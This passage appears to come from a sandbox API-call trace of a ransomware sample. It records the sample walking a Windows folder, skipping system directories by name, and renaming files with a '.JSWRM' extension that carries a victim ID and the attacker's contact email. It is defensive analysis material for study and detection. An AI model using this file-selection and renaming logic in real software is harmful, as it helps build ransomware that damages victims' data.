dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.482] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9663916936416592) returned 0 [0068.482] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.482] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.482] CloseHandle (hObject=0xffffffff) returned 1 [0068.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0068.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0068.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.482] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.482] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe462e472, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe462e472, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="IpsMigrationPlugin.dll", cAlternateFileName="")) returned 1 [0068.482] lstrcmpiW (lpString1="IpsMigrationPlugin.dll", lpString2=".") returned 1 [0068.482] lstrcmpiW (lpString1="IpsMigrationPlugin.dll", lpString2="..") returned 1 [0068.482] lstrcmpiW (lpString1="IpsMigrationPlugin.dll", lpString2="...") returned 1 [0068.482] lstrcmpiW (lpString1="IpsMigrationPlugin.dll", lpString2="windows") returned -1 [0068.483] lstrcmpiW (lpString1="IpsMigrationPlugin.dll", lpString2="recovery") returned -1 [0068.483] lstrcmpiW (lpString1="IpsMigrationPlugin.dll", lpString2="perflogs") returned -1 [0068.483] lstrcmpiW (lpString1="IpsMigrationPlugin.dll", lpString2="documents and settings") returned 1 [0068.483] lstrcmpiW (lpString1="IpsMigrationPlugin.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.483] lstrcmpiW (lpString1="IpsMigrationPlugin.dll", lpString2="system volume information") returned -1 [0068.483] lstrcmpiW (lpString1="IpsMigrationPlugin.dll", lpString2="msocache") returned -1 [0068.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IpsMigrationPlugin.dll", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0068.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IpsMigrationPlugin.dll", cchWideChar=22, lpMultiByteStr=0x2412b8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IpsMigrationPlugin.dll", lpUsedDefaultChar=0x0) returned 22 [0068.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IpsMigrationPlugin.dll", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0068.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0068.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IpsMigrationPlugin.dll", cchWideChar=22, lpMultiByteStr=0x241290, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IpsMigrationPlugin.dll", lpUsedDefaultChar=0x0) returned 22 [0068.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0068.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0068.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.483] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d100bae, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d100bae, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa42, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipsnld.xml", cAlternateFileName="")) returned 1 [0068.483] lstrcmpiW (lpString1="ipsnld.xml", lpString2=".") returned 1 [0068.483] lstrcmpiW (lpString1="ipsnld.xml", lpString2="..") returned 1 [0068.483] lstrcmpiW (lpString1="ipsnld.xml", lpString2="...") returned 1 [0068.483] lstrcmpiW (lpString1="ipsnld.xml", lpString2="windows") returned -1 [0068.483] lstrcmpiW (lpString1="ipsnld.xml", lpString2="recovery") returned -1 [0068.483] lstrcmpiW (lpString1="ipsnld.xml", lpString2="perflogs") returned -1 [0068.483] lstrcmpiW (lpString1="ipsnld.xml", lpString2="documents and settings") returned 1 [0068.483] lstrcmpiW (lpString1="ipsnld.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.483] lstrcmpiW (lpString1="ipsnld.xml", lpString2="system volume information") returned -1 [0068.483] lstrcmpiW (lpString1="ipsnld.xml", lpString2="msocache") returned -1 [0068.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0068.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsnld.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsnld.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsnld.xml", lpUsedDefaultChar=0x0) returned 10 [0068.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0068.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0068.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsnld.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsnld.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsnld.xml", lpUsedDefaultChar=0x0) returned 10 [0068.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0068.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0068.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0068.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0068.484] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.484] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9660996358654904) returned 0 [0068.484] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.484] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.484] CloseHandle (hObject=0xffffffff) returned 1 [0068.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0068.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0068.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0068.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.485] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0068.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0068.485] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d100bae, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d100bae, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa14, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipsnor.xml", cAlternateFileName="")) returned 1 [0068.485] lstrcmpiW (lpString1="ipsnor.xml", lpString2=".") returned 1 [0068.485] lstrcmpiW (lpString1="ipsnor.xml", lpString2="..") returned 1 [0068.485] lstrcmpiW (lpString1="ipsnor.xml", lpString2="...") returned 1 [0068.485] lstrcmpiW (lpString1="ipsnor.xml", lpString2="windows") returned -1 [0068.485] lstrcmpiW (lpString1="ipsnor.xml", lpString2="recovery") returned -1 [0068.485] lstrcmpiW (lpString1="ipsnor.xml", lpString2="perflogs") returned -1 [0068.485] lstrcmpiW (lpString1="ipsnor.xml", lpString2="documents and settings") returned 1 [0068.485] lstrcmpiW (lpString1="ipsnor.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.486] lstrcmpiW (lpString1="ipsnor.xml", lpString2="system volume information") returned -1 [0068.486] lstrcmpiW (lpString1="ipsnor.xml", lpString2="msocache") returned -1 [0068.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsnor.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsnor.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsnor.xml", lpUsedDefaultChar=0x0) returned 10 [0068.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsnor.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsnor.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsnor.xml", lpUsedDefaultChar=0x0) returned 10 [0068.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0068.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.486] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.487] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9661580474207704) returned 0 [0068.487] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.487] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.487] CloseHandle (hObject=0xffffffff) returned 1 [0068.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0068.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0068.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0068.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.487] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0068.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.488] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d100bae, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d100bae, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa28, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipsplk.xml", cAlternateFileName="")) returned 1 [0068.488] lstrcmpiW (lpString1="ipsplk.xml", lpString2=".") returned 1 [0068.488] lstrcmpiW (lpString1="ipsplk.xml", lpString2="..") returned 1 [0068.488] lstrcmpiW (lpString1="ipsplk.xml", lpString2="...") returned 1 [0068.488] lstrcmpiW (lpString1="ipsplk.xml", lpString2="windows") returned -1 [0068.488] lstrcmpiW (lpString1="ipsplk.xml", lpString2="recovery") returned -1 [0068.488] lstrcmpiW (lpString1="ipsplk.xml", lpString2="perflogs") returned -1 [0068.488] lstrcmpiW (lpString1="ipsplk.xml", lpString2="documents and settings") returned 1 [0068.488] lstrcmpiW (lpString1="ipsplk.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.488] lstrcmpiW (lpString1="ipsplk.xml", lpString2="system volume information") returned -1 [0068.488] lstrcmpiW (lpString1="ipsplk.xml", lpString2="msocache") returned -1 [0068.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsplk.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsplk.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsplk.xml", lpUsedDefaultChar=0x0) returned 10 [0068.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0068.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsplk.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsplk.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsplk.xml", lpUsedDefaultChar=0x0) returned 10 [0068.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0068.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0068.488] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), 